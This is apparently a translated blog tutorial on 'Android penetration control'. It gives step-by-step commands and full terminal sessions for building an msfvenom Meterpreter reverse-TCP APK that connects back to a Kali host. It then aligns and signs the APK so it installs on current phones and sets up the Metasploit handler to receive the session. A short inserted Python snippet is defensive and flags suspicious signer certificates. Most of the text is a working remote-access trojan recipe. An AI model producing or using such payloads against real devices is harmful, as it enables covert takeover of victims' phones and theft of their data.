
[Mobile Development] Android penetration control

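I: Generating the Android APK

1. Use msfvenom to generate an Android APK that is preset to connect back to the Kali host.
lhost=192.168.183.12 (this is the Kali IP) lport=55555 (the default is 4444; it can be customized)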

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk

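That produces a very simple Android application carrying the payload. Run ls -l and you will see a t.apk file in the current directory.

Many people following tutorials found through Baidu stop here, drop the file straight onto an Android phone and install it, and then it never connects. Those tutorials date from ancient times; nobody around us has a phone that old any more. Here we still need to align t.apk and then sign it.
Three tools are needed: zipalign, keytool and apksigner.
Kali 2020 ships only keytool by default. Some tutorials mention jarsigner, but Kali 2020 no longer has it, it is not in the package sources either, and apt-get install jarsigner reports that no such package exists. That is the tool needed for APK V1 signing. Here I use apksigner's V2 signing; the V1 and V2 signing flows differ, so do not copy one onto the other mechanically.
If you want to understand this part, search for zipalign.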


2. Align the APK with zipalign

zipalign -v 4 t.apk tz.apk

3. Generate a key pair

Generate the key pair:
keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
Explanation:
keytool -genkeypair -keystore <keystore name> -alias <key alias> -validity <days> -keyalg RSA

4. Sign the APK

Sign:
apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
Explanation:
apksigner sign --ks <keystore name> --ks-key-alias <key alias> tz.apk

5. Verify the APK signature

apksigner verify -v --print-certs tz.apk

At this point we are basically done. The final file, tz.apk, is the Android application we want.
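The same step 5 output seen from the triage side, as an added example that is not part of the original post: it parses `apksigner verify -v --print-certs` output into a structure and flags signer certificates that look hand-made, like the all-`jackson`, `C=22` certificate in the transcript on this page. The function names and the two heuristics are assumptions chosen for illustration.

```python
import re

# Constructed sample: lines in the shape of the `apksigner verify -v --print-certs`
# output shown in this page's transcript.
SAMPLE = """\
Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Number of signers: 1
Signer #1 certificate DN: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
"""

SCHEME_RE = re.compile(r"^Verified using (v\d) scheme .*: (true|false)$")
DN_RE = re.compile(r"^Signer #\d+ certificate DN: (.+)$")

def parse_verify_output(text):
    """Turn apksigner's human-readable report into a dict."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    report = {"verifies": bool(lines) and lines[0] == "Verifies",
              "schemes": {}, "signers": [], "errors": []}
    for line in lines:
        if m := SCHEME_RE.match(line):
            report["schemes"][m.group(1)] = m.group(2) == "true"
        elif m := DN_RE.match(line):
            # Naive split: adequate for simple DNs without escaped commas.
            parts = [p.strip().split("=", 1) for p in m.group(1).split(",") if "=" in p]
            report["signers"].append(dict(parts))
        elif line.startswith("ERROR:"):
            report["errors"].append(line[len("ERROR:"):].strip())
    return report

def triage_flags(report):
    """Hypothetical heuristics for signer certificates that look hand-made."""
    flags = []
    if not report["verifies"]:
        flags.append("signature does not verify")
    for dn in report["signers"]:
        names = {v for k, v in dn.items() if k != "C"}
        if len(dn) > 2 and len(names) == 1:
            flags.append("all DN name fields identical")
        if not re.fullmatch(r"[A-Z]{2}", dn.get("C", "")):
            flags.append("country code is not two letters")
    return flags

if __name__ == "__main__":
    r = parse_verify_output(SAMPLE)
    print(r["schemes"], triage_flags(r))
```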

Android control: full session

root@kali:~# msfconsole
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  55555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf5 exploit(multi/handler) > set lhost 192.168.183.12
lhost => 192.168.183.12
msf5 exploit(multi/handler) > exploit

[-] Handler failed to bind to 192.168.183.12:55555:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 

APK generation stage: full session

┌──(root💀kali)-[/home/kali/Desktop]
└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10190 bytes

                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# zipalign -v 4 t.apk tz.apk

Command 'zipalign' not found, but can be installed with:
apt install zipalign
Do you want to install it? (N/y)y
apt install zipalign
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog
  android-libunwind android-libutils android-libziparchive libzopfli1
The following NEW packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog
  android-libunwind android-libutils android-libziparchive libzopfli1 zipalign
0 upgraded, 9 newly installed, 0 to remove and 567 not upgraded.
Need to get 548 kB of archives.
After this operation, 1,726 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]
Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libunwind amd64 10.0.0+r36-4 [48.3 kB]
Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbacktrace amd64 1:10.0.0+r36-7 [153 kB]
Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]
Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libutils amd64 1:10.0.0+r36-7 [62.4 kB]
Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libziparchive amd64 1:10.0.0+r36-7 [35.5 kB]
Get:8 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libzopfli1 amd64 1.0.3-1 [101 kB]
Get:9 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 zipalign amd64 1:10.0.0+r36-1 [28.2 kB]
Fetched 548 kB in 1s (449 kB/s)
Selecting previously unselected package android-liblog.
(Reading database ... 268182 files and directories currently installed.)
Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-liblog (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libbase.
Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbase (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libunwind.
Preparing to unpack .../2-android-libunwind_10.0.0+r36-4_amd64.deb ...
Unpacking android-libunwind (10.0.0+r36-4) ...
Selecting previously unselected package android-libbacktrace.
Preparing to unpack .../3-android-libbacktrace_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbacktrace (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libcutils.
Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libutils.
Preparing to unpack .../5-android-libutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libziparchive.
Preparing to unpack .../6-android-libziparchive_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libziparchive (1:10.0.0+r36-7) ...
Selecting previously unselected package libzopfli1.
Preparing to unpack .../7-libzopfli1_1.0.3-1_amd64.deb ...
Unpacking libzopfli1 (1.0.3-1) ...
Selecting previously unselected package zipalign.
Preparing to unpack .../8-zipalign_1%3a10.0.0+r36-1_amd64.deb ...
Unpacking zipalign (1:10.0.0+r36-1) ...
Setting up android-liblog (1:10.0.0+r36-7) ...
Setting up libzopfli1 (1.0.3-1) ...
Setting up android-libunwind (10.0.0+r36-4) ...
Setting up android-libbase (1:10.0.0+r36-7) ...
Setting up android-libziparchive (1:10.0.0+r36-7) ...
Setting up android-libcutils (1:10.0.0+r36-7) ...
Setting up android-libbacktrace (1:10.0.0+r36-7) ...
Setting up android-libutils (1:10.0.0+r36-7) ...
Setting up zipalign (1:10.0.0+r36-1) ...
Processing triggers for libc-bin (2.32-4) ...
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.4.2) ...
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  jackson
What is the name of your organizational unit?
  [Unknown]:  jackson
What is the name of your organization?
  [Unknown]:  jackson
What is the name of your City or Locality?
  [Unknown]:  jackson
What is the name of your State or Province?
  [Unknown]:  jackson
What is the two-letter country code for this unit?
  [Unknown]:  22
Is CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22 correct?
  [no]:  y

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
        for: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
[Storing cg.keystore]
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
Command 'apksigner' not found, but can be installed with:
apt install apksigner
Do you want to install it? (N/y)y
apt install apksigner
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapksig-java
The following NEW packages will be installed:
  apksigner libapksig-java
0 upgraded, 2 newly installed, 0 to remove and 567 not upgraded.
Need to get 847 kB of archives.
After this operation, 980 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB]
Fetched 847 kB in 1s (1,115 kB/s)
Selecting previously unselected package libapksig-java.
(Reading database ... 268245 files and directories currently installed.)
Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ...
Unpacking libapksig-java (31.0.2-1) ...
Selecting previously unselected package apksigner.
Preparing to unpack .../apksigner_31.0.2-1_all.deb ...
Unpacking apksigner (31.0.2-1) ...
Setting up libapksig-java (31.0.2-1) ...
Setting up apksigner (31.0.2-1) ...
Processing triggers for kali-menu (2021.4.2) ...
Processing triggers for man-db (2.9.4-2) ...
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk                              127 ?

Exception in thread "main" java.io.FileNotFoundException: tz.apk (No such file or directory)
        at java.base/java.io.RandomAccessFile.open0(Native Method)
        at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345)
        at java.base/java.io.RandomAccessFile.<init>(RandomAccessFile.java:259)
        at java.base/java.io.RandomAccessFile.<init>(RandomAccessFile.java:214)
        at com.android.apksig.ApkVerifier.verify(ApkVerifier.java:143)
        at com.android.apksigner.ApkSignerTool.verify(ApkSignerTool.java:516)
        at com.android.apksigner.ApkSignerTool.main(ApkSignerTool.java:88)
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# zipalign -v 4 t.apk tz.apk                                              1 ?

Verifying alignment of tz.apk (4)...
      49 AndroidManifest.xml (OK - compressed)
    1779 resources.arsc (OK - compressed)
    1992 classes.dex (OK - compressed)
    8160 META-INF/ (OK)
    8210 META-INF/MANIFEST.MF (OK - compressed)
    8447 META-INF/SIGNFILE.SF (OK - compressed)
    8713 META-INF/SIGNFILE.RSA (OK - compressed)
Verification successful
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk

DOES NOT VERIFY
ERROR: JAR signer SIGNFILE.RSA: JAR signature META-INF/SIGNFILE.RSA uses digest algorithm SHA-256 and signature algorithm RSA which is not supported on API Level(s) 10-17 for which this APK is being verified
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk                1 ?
Keystore password for signer #1: 
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk

Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Verified for SourceStamp: false
Number of signers: 1
Signer #1 certificate DN: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
Signer #1 certificate SHA-256 digest: 0b0d4e001cd8419178570d9b654a4e12c04a5fd6b43ddba495cbe3c3daca25ad
Signer #1 certificate SHA-1 digest: 098dabd0918e21cc5f3d5315a476b64199835f51
Signer #1 certificate MD5 digest: 285862ef117e8115197d25f937e51de9
Signer #1 key algorithm: RSA
Signer #1 key size (bits): 2048
Signer #1 public key SHA-256 digest: 599dac27b2c16dde82fe2911857746cce415ea8cd1932aa0f3d70c185df3b059
Signer #1 public key SHA-1 digest: 6560ca068e18184624c0e40a32b5f075ed114a76
Signer #1 public key MD5 digest: be0f581cf0cec32e300f49098271b435
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# 

Added: 2022-02-04 11:08:59  Updated: 2022-02-04 11:09:10